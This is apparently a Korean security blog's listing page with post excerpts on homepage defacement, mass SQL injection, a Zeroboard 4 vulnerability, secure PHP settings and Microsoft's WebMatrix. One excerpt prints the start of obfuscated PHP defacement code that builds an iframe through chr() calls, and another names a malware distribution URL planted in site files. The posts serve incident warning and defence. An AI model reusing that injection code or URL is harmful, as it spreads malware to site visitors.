본문 바로가기

php66

MS, 오픈소스 웹개발툴 WebMatrix 마이크로소프트가 초보 웹 개발자들이나 이제 막 웹 개발에 입문하려는 개발자들을 위해 웹 개발 툴 킷인 웹매트릭스(WebMatrix)를 발표했다. 흥미로운 사실은 이 툴킷이 오픈소스 소프트웨어라는 것. 웹매트릭스는 개발툴을 비롯해 웹사이트를 구동하기 위한 웹 서버, 데이터베이스, 웹 프레임워크, 사용자 검색 편의를 도모할 수 있는 검색엔진 등의 기능도 제공한다. 또한 좀 더 다양한 프로그래밍 체계 지원을 위해 ASP.NET의 ‘Razor’나 PHP, 웹 도움말 기능 등을 제공한다. 트위터 피드나 비디오 같은 다중 코드를 지원하기 위해 싱글 코드라인도 제공한다. 웹매트릭스는 9개의 언어로 제공되며 워드프레스(WordPress), 줌라(Joomla!), 닷넷누크(DotNetNuke), 움바코(Umbarco)등.. 2011. 1. 18.
Mass SQL Injection Attack Code (PHP, MySQL) * 홈페이지 변조 및 Mass SQL Injection을 통해 대량 악성코드 유포 발생 - 최근 공격 코드 유형 파악해서 차단이나 알람 대응 필요 # 홈페이지 변조 코드 function gmfun($path){$daima=chr(60).chr(105).chr(102).chr(114).chr(97).chr(109).chr(101).chr(32).chr(115).chr(114).chr(99). chr(61).chr(38).chr(35).chr(120).chr(54).chr(56).chr(59).chr(38).chr(35).chr(120).chr(55).chr(52).chr(59). chr(38).chr(35).chr(120).chr(55).chr(52).chr(59).chr(38).chr(35).chr(12.. 2010. 12. 28.
홈페이지 변조 악성코드 삽입 (PHP 사용 주의) 최근에 발생되는 홈페이지 변조를 통해 악성코드를 삽입하여 유포되는 해킹사고가 있었으며 현재도 계속 진행중에 있습니다. 제로보드와 몇 사이트에서 관련 정보가 점차 오픈되면서 분석 내용과 조치 사항이 나오고 있는데 문제는 제로보드의 취약점만으로 본다는 것입니다. 현재는 공개된 PHP 웹솔루션 중 많이 알려진 제로보드를 통해 발생하고 있지만 이번에 확인된 문제는 특정 솔루션(제로보드)만의 문제가 아닐 수 있습니다. 이는 PHP 권고 방식을 사용하지 않을 경우 문제가 발생될 수 있어 위험한 수준에 있습니다. 단, 몇일전 포스팅한 PHP 안전한 환경에 언급한 옵션인 상태라면 현재로선 이번 사고에 대해서는 안전할 수 있을 것 같습니다. PHP 안전한 환경 (공개용 PHP 솔루션 사용시 주의사항) - http://b.. 2010. 12. 23.
국내 공개 웹 게시판(제로보드) 취약점 주의 _______________________________________________________________________________ 원인 : 제로보드 4 게시판의 취약성을 이용한 파일 변조 증상 : 1. bbs/icon 폴더에 group_qazwsxedc.jpg 파일과 visitLog.php 생성 2. 계정내 확장자가 html, php 파일들에 frame src="악성코드 배포지 URL 삽입 (예: http://h.nexprice.com/css/x.htm) * 주로 bbs/폴더내의 파일들에 소스가 삽입됩니다. * 계정내 파일들에 iframe 삽입은 없을 수도 있습니다. 3. 제로보드 DB에 zetyx_group_table 생성되고 이 테이블의 header 또는 header_url 에 위 2번과.. 2010. 12. 22.
PHP 안전한 환경 (공개용 PHP 솔루션 사용시 주의사항) 최근 심각해 보이는 PHP 문제가 확인되었습니다. 특히, 공개용 PHP 솔루션(예, 제로보드, 그누보드 등)을 사용할 경우 매우 주의가 필요합니다. 꼭 공개용 솔루션만 문제는 아니지만 소스가 오픈되지 않은 경우 일반적으로 위험성이 낮습니다. 많은 취약점들이 공개용 솔루션에서 끝도 없이 발생하며 악성코드 유포의 주범이 되고 있습니다. 문제가 외부에 공개될 경우 홈페이지 변조를 통한 악성코드 감염이 추가 발생할 수 있습니다. 아래 사항은 이미 위험성이 알려진 부분이지만 적용되지 않은 경우 추가 위험성이 존재하여 다시한번 중요한 PHP 옵션에 대해 언급하며, 이를 반영할 경우 피해를 최소화 할 수 있습니다. 1. register_globals=Off 2. session.cookie_httponly=On (ph.. 2010. 12. 21.